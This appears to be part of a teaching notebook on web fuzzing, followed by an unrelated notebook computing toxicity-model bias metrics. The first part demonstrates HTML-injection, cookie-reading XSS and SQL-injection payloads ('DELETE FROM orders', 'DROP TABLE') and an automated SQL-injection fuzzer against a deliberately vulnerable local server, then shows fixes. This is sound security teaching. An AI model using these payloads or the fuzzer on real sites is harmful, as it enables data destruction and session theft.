slideshow={"slide_type": "subslide"} # We can run the crawler on our own server, where it will quickly return the order page and the terms and conditions page. # + slideshow={"slide_type": "fragment"} for url in crawl(httpd_url): print_httpd_messages() print_url(url) # + [markdown] slideshow={"slide_type": "fragment"} # We can also crawl over other sites, such as the home page of this project. # + slideshow={"slide_type": "subslide"} for url in crawl("https://www.fuzzingbook.org/"): print_url(url) # + [markdown] slideshow={"slide_type": "subslide"} # Once we have crawled over all the links of a site, we can generate tests for all the forms we found: # + slideshow={"slide_type": "fragment"} for url in crawl(httpd_url, max_pages=float('inf')): web_form_fuzzer = WebFormFuzzer(url) web_form_runner = WebRunner(url) print(web_form_fuzzer.run(web_form_runner)) # + [markdown] slideshow={"slide_type": "fragment"} # For even better effects, one could integrate crawling and fuzzing – and also analyze the order confirmation pages for further links. We leave this to the reader as an exercise. # + [markdown] slideshow={"slide_type": "fragment"} # Let us get rid of any server messages accumulated above: # + slideshow={"slide_type": "fragment"} clear_httpd_messages() # + [markdown] slideshow={"slide_type": "slide"} # ## Crafting Web Attacks # # Before we close the chapter, let us take a look at a special class of "uncommon" inputs that not only yield generic failures, but actually allow _attackers_ to manipulate the server at their will. We will illustrate three common attacks using our server, which (surprise) actually turns out to be vulnerable against all of them. # + [markdown] slideshow={"slide_type": "subslide"} # ### HTML Injection Attacks # # The first kind of attack we look at is *HTML injection*. The idea of HTML injection is to supply the Web server with _data that can also be interpreted as HTML_. If this HTML data is then displayed to users in their Web browsers, it can serve malicious purposes, although (seemingly) originating from a reputable site. If this data is also _stored_, it becomes a _persistent_ attack; the attacker does not even have to lure victims towards specific pages. # + [markdown] slideshow={"slide_type": "fragment"} # Here is an example of a (simple) HTML injection. For the `name` field, we not only use plain text, but also embed HTML tags – in this case, a link towards a malware-hosting site. # + slideshow={"slide_type": "skip"} from Grammars import extend_grammar # + slideshow={"slide_type": "subslide"} ORDER_GRAMMAR_WITH_HTML_INJECTION = extend_grammar(ORDER_GRAMMAR, { "<name>": [cgi_encode(''' <NAME><p> <strong><a href="www.lots.of.malware">Click here for cute cat pictures!</a></strong> </p> ''')], }) # + [markdown] slideshow={"slide_type": "fragment"} # If we use this grammar to create inputs, the resulting URL will have all of the HTML encoded in: # + slideshow={"slide_type": "fragment"} html_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_HTML_INJECTION) order_with_injected_html = html_injection_fuzzer.fuzz() order_with_injected_html # + [markdown] slideshow={"slide_type": "subslide"} # What hapens if we send this string to our Web server? It turns out that the HTML is left in the confirmation page and shown as link. This also happens in the log: # + slideshow={"slide_type": "fragment"} HTML(webbrowser(urljoin(httpd_url, order_with_injected_html))) # + [markdown] slideshow={"slide_type": "fragment"} # Since the link seemingly comes from a trusted origin, users are much more likely to follow it. The link is even persistent, as it is stored in the database: # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders WHERE name LIKE '%<%'").fetchall()) # + [markdown] slideshow={"slide_type": "subslide"} # This means that anyone ever querying the database (for instance, operators processing the order) will also see the link, multiplying its impact. By carefully crafting the injected HTML, one can thus expose malicious content to a large number of users – until the injected HTML is finally deleted. # + [markdown] slideshow={"slide_type": "subslide"} # ### Cross-Site Scripting Attacks # # If one can inject HTML code into a Web page, one can also inject *JavaScript* code as part of the injected HTML. This code would then be executed as soon as the injected HTML is rendered. # # This is particularly dangerous because executed JavaScript always executes in the _origin_ of the page which contains it. Therefore, an attacker can normally not force a user to run JavaScript in any origin he does not control himself. When an attacker, however, can inject his code into a vulnerable Web application, he can have the client run the code with the (trusted) Web application as origin. # # In such a *cross-site scripting* (*XSS*) attack, the injected script can do a lot more than just plain HTML. For instance, the code can access sensitive page content or session cookies. If the code in question runs in the operator's browser (for instance, because an operator is reviewing the list of orders), it could retrieve any other information shown on the screen and thus steal order details for a variety of customers. # + [markdown] slideshow={"slide_type": "subslide"} # Here is a very simple example of a script injection. Whenever the name is displayed, it causes the browser to "steal" the current *session cookie* – the piece of data the browser uses to identify the user with the server. In our case, we could steal the cookie of the Jupyter session. # + slideshow={"slide_type": "fragment"} ORDER_GRAMMAR_WITH_XSS_INJECTION = extend_grammar(ORDER_GRAMMAR, { "<name>": [cgi_encode('<NAME>' + '<script>' + 'document.title = document.cookie.substring(0, 10);' + '</script>') ], }) # + slideshow={"slide_type": "subslide"} xss_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_XSS_INJECTION) order_with_injected_xss = xss_injection_fuzzer.fuzz() order_with_injected_xss # + slideshow={"slide_type": "fragment"} url_with_injected_xss = urljoin(httpd_url, order_with_injected_xss) url_with_injected_xss # + slideshow={"slide_type": "fragment"} HTML(webbrowser(url_with_injected_xss, mute=True)) # + [markdown] slideshow={"slide_type": "subslide"} # The message looks as always – but if you have a look at your browser title, it should now show the first 10 characters of your "secret" notebook cookie. Instead of showing its prefix in the title, the script could also silently send the cookie to a remote server, allowing attackers to highjack your current notebook session and interact with the server on your behalf. It could also go and access and send any other data that is shown in your browser or otherwise available. It could run a *keylogger* and steal passwords and other sensitive data as it is typed in. Again, it will do so every time the compromised order with <NAME>'s name is shown in the browser and the associated script is executed. # + [markdown] slideshow={"slide_type": "fragment"} # Let us go and reset the title to a less sensitive value: # + slideshow={"slide_type": "fragment"} HTML('<script>document.title = "Jupyter"</script>') # + [markdown] slideshow={"slide_type": "subslide"} # ### SQL Injection Attacks # # Cross-site scripts have the same privileges as web pages – most notably, they cannot access or change data outside of your browser. So-called *SQL injection* targets _databases_, allowing to inject commands that can read or modify data in the database, or change the purpose of the original query. # + [markdown] slideshow={"slide_type": "subslide"} # To understand how SQL injection works, let us take a look at the code that produces the SQL command to insert a new order into the database: # # ```python # sql_command = ("INSERT INTO orders " + # "VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)) # ``` # # What happens if any of the values (say, `name`) has a value that _can also be interpreted as a SQL command?_ Then, instead of the intended `INSERT` command, we would execute the command imposed by `name`. # + [markdown] slideshow={"slide_type": "subslide"} # Let us illustrate this by an example. We set the individual values as they would be found during execution: # + slideshow={"slide_type": "fragment"} values = { "item": "tshirt", "name": "<NAME>", "email": "<EMAIL>", "city": "Seattle", "zip": "98104" } # + [markdown] slideshow={"slide_type": "fragment"} # and format the string as seen above: # + slideshow={"slide_type": "fragment"} sql_command = ("INSERT INTO orders " + "VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)) sql_command # + [markdown] slideshow={"slide_type": "subslide"} # All fine, right? But now, we define a very "special" name that can also be interpreted as a SQL command: # + slideshow={"slide_type": "fragment"} values["name"] = "Jane', 'x', 'x', 'x'); DELETE FROM orders; -- " # + slideshow={"slide_type": "fragment"} sql_command = ("INSERT INTO orders " + "VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)) sql_command # + [markdown] slideshow={"slide_type": "fragment"} # What happens here is that we now get a command to insert values into the database (with a few "dummy" values `x`), followed by a SQL `DELETE` command that would _delete all entries_ of the orders table. The string `-- ` starts a SQL _comment_ such that the remainder of the original query would be easily ignored. By crafting strings that can also be interpreted as SQL commands, attackers can alter or delete database data, bypass authentication mechanisms and many more. # + [markdown] slideshow={"slide_type": "subslide"} # Is our server also vulnerable to such attacks? Of course it is. We create a special grammar such that we can set the `<name>` parameter to a string with SQL injection, just as shown above. # + slideshow={"slide_type": "skip"} from Grammars import extend_grammar # + slideshow={"slide_type": "fragment"} ORDER_GRAMMAR_WITH_SQL_INJECTION = extend_grammar(ORDER_GRAMMAR, { "<name>": [cgi_encode("Jane', 'x', 'x', 'x'); DELETE FROM orders; --")], }) # + slideshow={"slide_type": "fragment"} sql_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_SQL_INJECTION) order_with_injected_sql = sql_injection_fuzzer.fuzz() order_with_injected_sql # + [markdown] slideshow={"slide_type": "fragment"} # These are the current orders: # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "subslide"} # Let us go and send our URL with SQL injection to the server. From the log, we see that the "malicious" SQL command is formed just as sketched above, and executed, too. # + slideshow={"slide_type": "fragment"} contents = webbrowser(urljoin(httpd_url, order_with_injected_sql)) # + [markdown] slideshow={"slide_type": "fragment"} # All orders are now gone: # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "fragment"} # This effect is also illustrated [in this very popular XKCD comic](https://xkcd.com/327/): # + [markdown] slideshow={"slide_type": "fragment"} # ![https://xkcd.com/327/](PICS/xkcd_exploits_of_a_mom.png){width=100%} # + [markdown] slideshow={"slide_type": "subslide"} # Even if we had not been able to execute arbitrary commands, being able to compromise an orders database offers several possibilities for mischief. For instance, we could use the address and matching credit card number of an existing person to go through validation and submit an order, only to have the order then delivered to an address of our choice. We could also use SQL injection to inject HTML and JavaScript code as above, bypassing possible sanitization geared at these domains. # + [markdown] slideshow={"slide_type": "fragment"} # To avoid such effects, the remedy is to _sanitize_ all third-party inputs – no character in the input must be interpretable as plain HTML, JavaScript, or SQL. This is achieved by properly _quoting_ and _escaping_ inputs. The [exercises](#Exercises) give some instructions on what to do. # + [markdown] slideshow={"slide_type": "subslide"} # ### Leaking Internal Information # # To craft the above SQL queries, we have used _insider information_ – for instance, we knew the name of the table as well as its structure. Surely, an attacker would not know this and thus not be able to run the attack, right? Unfortunately, it turns out we are leaking all of this information out to the world in the first place. The error message produced by our server reveals everything we need: # + slideshow={"slide_type": "fragment"} answer = webbrowser(urljoin(httpd_url, "/order"), mute=True) # + slideshow={"slide_type": "fragment"} HTML(answer) # + [markdown] slideshow={"slide_type": "subslide"} # The best way to avoid information leakage through failures is of course not to fail in the first place. But if you fail, make it hard for the attacker to establish a link between the attack and the failure. Do not produce "internal error" messages (and certainly not ones with internal information); do not become unresponsive; just go back to the home page and ask the user to supply correct data. One more time, the [exercises](#Exercises) give some instructions on how to fix the server. # + [markdown] slideshow={"slide_type": "fragment"} # If you can manipulate the server not only to alter information, but also to _retrieve_ information, you can learn about table names and structure by accessing special _tables_ (also called *data dictionary*) in which database servers store their metadata. In the MySQL server, for instance, the special table `information_schema` holds metadata such as the names of databases and tables, data types of columns, or access privileges. # + [markdown] slideshow={"slide_type": "slide"} # ## Fully Automatic Web Attacks # + [markdown] slideshow={"slide_type": "fragment"} # So far, we have demonstrated the above attacks using our manually written order grammar. However, the attacks also work for generated grammars. We extend `HTMLGrammarMiner` by adding a number of common SQL injection attacks: # + slideshow={"slide_type": "subslide"} class SQLInjectionGrammarMiner(HTMLGrammarMiner): ATTACKS = [ "<string>' <sql-values>); <sql-payload>; <sql-comment>", "<string>' <sql-comment>", "' OR 1=1<sql-comment>'", "<number> OR 1=1", ] def __init__(self, html_text, sql_payload): super().__init__(html_text) self.QUERY_GRAMMAR = extend_grammar(self.QUERY_GRAMMAR, { "<text>": ["<string>", "<sql-injection-attack>"], "<number>": ["<digits>", "<sql-injection-attack>"], "<checkbox>": ["<_checkbox>", "<sql-injection-attack>"], "<email>": ["<_email>", "<sql-injection-attack>"], "<sql-injection-attack>": [ cgi_encode(attack, "<->") for attack in self.ATTACKS ], "<sql-values>": ["", cgi_encode("<sql-values>, '<string>'", "<->")], "<sql-payload>": [cgi_encode(sql_payload)], "<sql-comment>": ["--", "#"], }) # + slideshow={"slide_type": "subslide"} html_miner = SQLInjectionGrammarMiner( html_text, sql_payload="DROP TABLE orders") # + slideshow={"slide_type": "subslide"} grammar = html_miner.mine_grammar() grammar # + slideshow={"slide_type": "subslide"} grammar["<text>"] # + [markdown] slideshow={"slide_type": "fragment"} # We see that several fields now are tested for vulnerabilities: # + slideshow={"slide_type": "fragment"} sql_fuzzer = GrammarFuzzer(grammar) sql_fuzzer.fuzz() # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + slideshow={"slide_type": "fragment"} contents = webbrowser(urljoin(httpd_url, "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104")) # + slideshow={"slide_type": "subslide"} def orders_db_is_empty(): try: entries = db.execute("SELECT * FROM orders").fetchall() except sqlite3.OperationalError: return True return len(entries) == 0 # + slideshow={"slide_type": "fragment"} orders_db_is_empty() # + slideshow={"slide_type": "subslide"} class SQLInjectionFuzzer(WebFormFuzzer): def __init__(self, url, sql_payload="", **kwargs): self.sql_payload = sql_payload super().__init__(url, **kwargs) def get_grammar(self, html_text): grammar_miner = SQLInjectionGrammarMiner( html_text, sql_payload=self.sql_payload) return grammar_miner.mine_grammar() # + slideshow={"slide_type": "subslide"} sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders") web_runner = WebRunner(httpd_url) trials = 1 while True: sql_fuzzer.run(web_runner) if orders_db_is_empty(): break trials += 1 # + slideshow={"slide_type": "fragment"} trials # + [markdown] slideshow={"slide_type": "fragment"} # Our attack was successful! After less than a second of testing, our database is empty: # + slideshow={"slide_type": "fragment"} orders_db_is_empty() # + [markdown] slideshow={"slide_type": "subslide"} # Again, note the level of possible automation: We can # # * Crawl the Web pages of a host for possible forms # * Automatically identify form fields and possible values # * Inject SQL (or HTML, or JavaScript) into any of these fields # # and all of this fully automatically, not needing anything but the URL of the site. # + [markdown] slideshow={"slide_type": "subslide"} # The bad news is that with a tool set as the above, anyone can attack web sites. The even worse news is that such penetration tests take place every day, on every web site. The good news, though, is that after reading this chapter, you now get an idea of how Web servers are attacked every day – and what you as a Web server maintainer could and should do to prevent this. # + [markdown] slideshow={"slide_type": "slide"} # ## Synopsis # # This chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it. # + [markdown] slideshow={"slide_type": "subslide"} # ### Fuzzing Web Forms # # `WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements. # + [markdown] slideshow={"slide_type": "fragment"} # Here's the grammar extracted for our vulnerable Web server: # + slideshow={"slide_type": "fragment"} web_form_fuzzer = WebFormFuzzer(httpd_url) # + slideshow={"slide_type": "fragment"} web_form_fuzzer.grammar['<start>'] # + slideshow={"slide_type": "fragment"} web_form_fuzzer.grammar['<action>'] # + slideshow={"slide_type": "fragment"} web_form_fuzzer.grammar['<query>'] # + [markdown] slideshow={"slide_type": "subslide"} # Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form. # + slideshow={"slide_type": "fragment"} web_form_fuzzer.fuzz() # + [markdown] slideshow={"slide_type": "fragment"} # Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values. # + [markdown] slideshow={"slide_type": "subslide"} # ### SQL Injection Attacks # # `SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`: # + slideshow={"slide_type": "fragment"} sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders") sql_fuzzer.fuzz() # + [markdown] slideshow={"slide_type": "fragment"} # As you can see, the path to be retrieved contains the payload encoded into one of the form field values. # + [markdown] slideshow={"slide_type": "fragment"} # `SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it. # + [markdown] button=false new_sheet=true run_control={"read_only": false} slideshow={"slide_type": "slide"} # ## Lessons Learned # # * User Interfaces (in the Web and elsewhere) should be tested with _expected_ and _unexpected_ values. # * One can _mine grammars from user interfaces_, allowing for their widespread testing. # * Consequent _sanitizing_ of inputs prevents common attacks such as code and SQL injection. # * Do not attempt to write a Web server yourself, as you are likely to repeat all the mistakes of others. # + [markdown] slideshow={"slide_type": "fragment"} # We're done, so we can clean up: # + slideshow={"slide_type": "fragment"} clear_httpd_messages() # + slideshow={"slide_type": "fragment"} httpd_process.terminate() # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "slide"} # ## Next Steps # # From here, the next step is [GUI Fuzzing](GUIFuzzer.ipynb), going from HTML- and Web-based user interfaces to generic user interfaces (including JavaScript and mobile user interfaces). # # If you are interested in security testing, do not miss our [chapter on information flow](InformationFlow.ipynb), showing how to systematically detect information leaks; this also addresses the issue of SQL Injection attacks. # + [markdown] slideshow={"slide_type": "slide"} # ## Background # # The [Wikipedia pages on Web application security](https://en.wikipedia.org/wiki/Web_application_security) are a mandatory read for anyone building, maintaining, or testing Web applications. In 2012, cross-site scripting and SQL injection, as discussed in this chapter, made up more than 50% of Web application vulnerabilities. # # The [Wikipedia page on penetration testing](https://en.wikipedia.org/wiki/Penetration_test) provides a comprehensive overview on the history of penetration testing, as well as collections of vulnerabilities. # # The [OWASP Zed Attack Proxy Project](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) (ZAP) is an open source Web site security scanner including several of the features discussed above, and many many more. # + [markdown] button=false new_sheet=true run_control={"read_only": false} slideshow={"slide_type": "slide"} # ## Exercises # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} # ### Exercise 1: Fix the Server # # Create a `BetterHTTPRequestHandler` class that fixes the several issues of `SimpleHTTPRequestHandler`: # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} solution2="hidden" solution2_first=true # #### Part 1: Silent Failures # # Set up the server such that it does not reveal internal information – in particular, tracebacks and HTTP status codes. # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # **Solution.** We define a better message that does not reveal tracebacks: # + slideshow={"slide_type": "skip"} solution2="hidden" BETTER_HTML_INTERNAL_SERVER_ERROR = \ HTML_INTERNAL_SERVER_ERROR.replace("<pre>{error_message}</pre>", "") # + slideshow={"slide_type": "skip"} solution2="hidden" HTML(BETTER_HTML_INTERNAL_SERVER_ERROR) # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # We have the `internal_server_error()` message return `HTTPStatus.OK` to make it harder for machines to find out something went wrong: # + slideshow={"slide_type": "skip"} solution2="hidden" class BetterHTTPRequestHandler(SimpleHTTPRequestHandler): def internal_server_error(self): # Note: No INTERNAL_SERVER_ERROR status self.send_response(HTTPStatus.OK, "Internal Error") self.send_header("Content-type", "text/html") self.end_headers() exc = traceback.format_exc() self.log_message("%s", exc.strip()) # No traceback or other information message = BETTER_HTML_INTERNAL_SERVER_ERROR self.wfile.write(message.encode("utf8")) # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} # #### Part 2: Sanitized HTML # # Set up the server such that it is not vulnerable against HTML and JavaScript injection attacks, notably by using methods such as `html.escape()` to escape special characters when showing them. # + slideshow={"slide_type": "skip"} solution2="hidden" solution2_first=true import html # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # **Solution.** We pass all values read through `html.escape()` before showing them on the screen; this will properly encode `<`, `&`, and `>` characters. # + slideshow={"slide_type": "skip"} solution2="hidden" class BetterHTTPRequestHandler(BetterHTTPRequestHandler): def send_order_received(self, values): sanitized_values = {} for field in values: sanitized_values[field] = html.escape(values[field]) sanitized_values["item_name"] = html.escape( FUZZINGBOOK_SWAG[values["item"]]) confirmation = HTML_ORDER_RECEIVED.format( **sanitized_values).encode("utf8") self.send_response(HTTPStatus.OK, "Order received") self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(confirmation) # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} solution2="hidden" solution2_first=true # #### Part 3: Sanitized SQL # # Set up the server such that it is not vulnerable against SQL injection attacks, notably by using _SQL parameter substitution._ # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # **Solution.** We use SQL parameter substitution to avoid interpretation of inputs as SQL commands. Also, we use `execute()` rather than `executescript()` to avoid processing of multiple commands. # + slideshow={"slide_type": "skip"} solution2="hidden" class BetterHTTPRequestHandler(BetterHTTPRequestHandler): def store_order(self, values): db = sqlite3.connect(ORDERS_DB) db.execute("INSERT INTO orders VALUES (?, ?, ?, ?, ?)", (values['item'], values['name'], values['email'], values['city'], values['zip'])) db.commit() # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # One could also argue not to save "dangerous" characters in the first place. But then, there might always be names or addresses with special characters which all need to be handled. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} solution2="hidden" solution2_first=true # #### Part 4: A Robust Server # # Set up the server such that it does not crash with invalid or missing fields. # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # **Solution.** We set up a simple check at the beginning of `handle_order()` that checks whether all required fields are present. If not, we return to the order form. # + cell_style="split" slideshow={"slide_type": "skip"} solution2="hidden" class BetterHTTPRequestHandler(BetterHTTPRequestHandler): REQUIRED_FIELDS = ['item', 'name', 'email', 'city', 'zip'] def handle_order(self): values = self.get_field_values() for required_field in self.REQUIRED_FIELDS: if required_field not in values: self.send_order_form() return self.store_order(values) self.send_order_received(values) # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # This could easily be extended to check for valid (at least non-empty) values. Also, the order form should be pre-filled with the originally submitted values, and come with a helpful error message. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} solution2="hidden" solution2_first=true # #### Part 5: Test it! # # Test your improved server whether your measures have been successful. # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # **Solution.** Here we go: # + slideshow={"slide_type": "skip"} solution2="hidden" httpd_process, httpd_url = start_httpd(BetterHTTPRequestHandler) # + slideshow={"slide_type": "skip"} solution2="hidden" print_url(httpd_url) # + slideshow={"slide_type": "skip"} solution2="hidden" print_httpd_messages() # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # We test standard behavior: # + slideshow={"slide_type": "skip"} solution2="hidden" standard_order = "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104" contents = webbrowser(httpd_url + standard_order) HTML(contents) # + slideshow={"slide_type": "skip"} solution2="hidden" assert contents.find("Thank you") > 0 # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # We test for incomplete URLs: # + slideshow={"slide_type": "skip"} solution2="hidden" bad_order = "/order?item=" contents = webbrowser(httpd_url + bad_order) HTML(contents) # + slideshow={"slide_type": "skip"} solution2="hidden" assert contents.find("Order Form") > 0 # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # We test for HTML (and JavaScript) injection: # + slideshow={"slide_type": "skip"} solution2="hidden" injection_order = "/order?item=tshirt&name=Jane+Doe" + cgi_encode("<script></script>") + \ "&email=doe%40example.com&city=Seattle&zip=98104" contents = webbrowser(httpd_url + injection_order) HTML(contents) # + slideshow={"slide_type": "skip"} solution2="hidden" assert contents.find("Thank you") > 0 assert contents.find("<script>") < 0 assert contents.find("&lt;script&gt;") > 0 # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # We test for SQL injection: # + slideshow={"slide_type": "skip"} solution2="hidden" sql_order = "/order?item=tshirt&name=" + \ cgi_encode("Robert', 'x', 'x', 'x'); DELETE FROM orders; --") + \ "&email=doe%40example.com&city=Seattle&zip=98104" contents = webbrowser(httpd_url + sql_order) HTML(contents) # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # (Okay, so obviously we can now handle the weirdest of names; still, Robert should consider changing his name...) # + slideshow={"slide_type": "skip"} solution2="hidden" assert contents.find("DELETE FROM") > 0 assert not orders_db_is_empty() # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # That's it – we're done! # + slideshow={"slide_type": "skip"} solution2="hidden" httpd_process.terminate() # + slideshow={"slide_type": "skip"} solution2="hidden" if os.path.exists(ORDERS_DB): os.remove(ORDERS_DB) # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} solution="hidden" solution2="hidden" solution2_first=true solution_first=true # ### Exercise 2: Protect the Server # # Assume that it is not possible for you to alter the server code. Create a _filter_ that is run on all URLs before they are passed to the server. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} solution="hidden" solution2="hidden" solution2_first=true solution_first=true # #### Part 1: A Blacklisting Filter # # Set up a filter function `blacklist(url)` that returns `False` for URLs that should not reach the server. Check the URL for whether it contains HTML, JavaScript, or SQL fragments. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} solution="hidden" solution2="hidden" solution2_first=true solution_first=true # #### Part 2: A Whitelisting Filter # # Set up a filter function `whitelist(url)` that returns `True` for URLs that are allowed to reach the server. Check the URL for whether it conforms to expectations; use a [parser](Parser.ipynb) and a dedicated grammar for this purpose. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "skip"} solution="hidden" solution2="hidden" # **Solution.** Left to the reader. # + [markdown] slideshow={"slide_type": "subslide"} solution2="hidden" solution2_first=true # ### Exercise 3: Input Patterns # # To fill out forms, fuzzers could be much smarter in how they generate input values. Starting with HTML 5, input fields can have a `pattern` attribute defining a _regular expression_ that an input value has to satisfy. A 5-digit ZIP code, for instance, could be defined by the pattern # # ```html # <input type="text" pattern="[0-9][0-9][0-9][0-9][0-9]"> # ``` # # Extract such patterns from the HTML page and convert them into equivalent grammar production rules, ensuring that only inputs satisfying the patterns are produced. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "skip"} solution="hidden" solution2="hidden" # **Solution.** Left to the reader at this point. # + [markdown] slideshow={"slide_type": "subslide"} solution2="hidden" solution2_first=true # ### Exercise 4: Coverage-Driven Web Fuzzing # # Combine the above fuzzers with [coverage-driven](GrammarCoverageFuzzer.ipynb) and [search-based](SearchBasedFuzzer.ipynb) approaches to maximize feature and code coverage. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "skip"} solution="hidden" solution2="hidden" # **Solution.** Left to the reader at this point.
docs/beta/notebooks/WebFuzzer.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # + from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import pandas as pd import numpy as np import pkg_resources import matplotlib.pyplot as plt import seaborn as sns # %matplotlib inline import model_bias_analysis # autoreload makes it easier to interactively work on code in the model_bias_analysis module. # %load_ext autoreload # %autoreload 2 # + models = ['Rock:TOXICITY', 'RockV6_1:TOXICITY'] madlibs = pd.read_csv('eval_datasets/bias_madlibs_77k_scored_prod_models.csv') # Add columns for each subgroup. f = open('bias_madlibs_data/adjectives_people.txt', 'r') terms = [line.strip() for line in f] model_bias_analysis.add_subgroup_columns_from_text(madlibs, 'Text', terms) madlibs['label_bool'] = madlibs.apply(lambda row: row.Label == 'BAD', axis=1) # - def convert_to_boolean_labels(labels): return np.where(labels >= 0.5, True, False) # + human_labels = [ 'toxicity', 'severe_toxicity', 'obscene', 'sexual_explicit', 'identity_attack', 'insult', 'threat', 'male', 'female', 'transgender', 'other_gender', 'heterosexual', 'homosexual_gay_or_lesbian', 'bisexual', 'other_sexual_orientation', 'christian', 'jewish', 'muslim', 'hindu', 'buddhist', 'atheist', 'other_religion', 'black', 'white', 'asian', 'latino', 'other_race_or_ethnicity', 'physical_disability', 'intellectual_or_learning_disability', 'psychiatric_or_mental_illness', 'other_disability'] identities = [ 'male', 'female', 'transgender', 'heterosexual', 'homosexual_gay_or_lesbian', 'bisexual', 'christian', 'jewish', 'muslim', 'hindu', #'buddhist', 'atheist', 'other_religion', 'black', 'white', 'asian', 'latino', 'other_race_or_ethnicity', #'physical_disability', 'intellectual_or_learning_disability', 'psychiatric_or_mental_illness'] # + real_data_models = ['rock_toxicity', 'rock_v6_1_toxicity'] real_data = pd.read_csv('eval_datasets/identity_labeled_scored.csv') for human_label in human_labels: real_data[human_label] = convert_to_boolean_labels(real_data[human_label]) #Short data only real_data = real_data[(real_data.comment_text.str.len() < 100)] # - madlibs_results = model_bias_analysis.compute_bias_metrics_for_models(madlibs, terms, models, 'label_bool') real_data_results = model_bias_analysis.compute_bias_metrics_for_models(real_data, identities, real_data_models, 'toxicity') # ### AUC Heatmap # The heatmap below shows the three AUC-based metrics for two models. Each column is labeled with "MODEL\_NAME"_"METRIC\_NAME" # # Metrics: # * <b>Subgroup AUC</b>: AUC of examples within the identity subgroup. # * <b>Negative Cross AUC</b>: AUC of negative (out of class, i.e. non-toxic) examples in the identity subgroup, and positive examples outside the identity subgroup. # * <b>Positive Cross AUC</b>: AUC of negative (out of class, i.e. non-toxic) examples outside the identity subgroup, and positive examples in the identity subgroup. # # Values should range between 0.5-1.0 and higher is better. # model_bias_analysis.plot_auc_heatmap(madlibs_results, models) # ### AEG Heatmap # The heatmap below shows the two Average Equality Gap metrics for two models. # # Metrics: # * <b>Negative AEG</b>: Measures the difference between the distributions of out-of-class examples within the subgroup and outside the subgroup. # * <b>Positive AEG</b>: Measures the difference between the distributions of in-class examples within the subgroup and outside the subgroup. # # 0 is the ideal for this metric. Postive values indicate a skew towards higher scores, negative values indicate a skew towards lower scores. model_bias_analysis.plot_aeg_heatmap(madlibs_results, models) model_bias_analysis.plot_auc_heatmap(real_data_results, real_data_models) model_bias_analysis.plot_aeg_heatmap(real_data_results, real_data_models)
unintended_ml_bias/metric_heatmap_example.ipynb
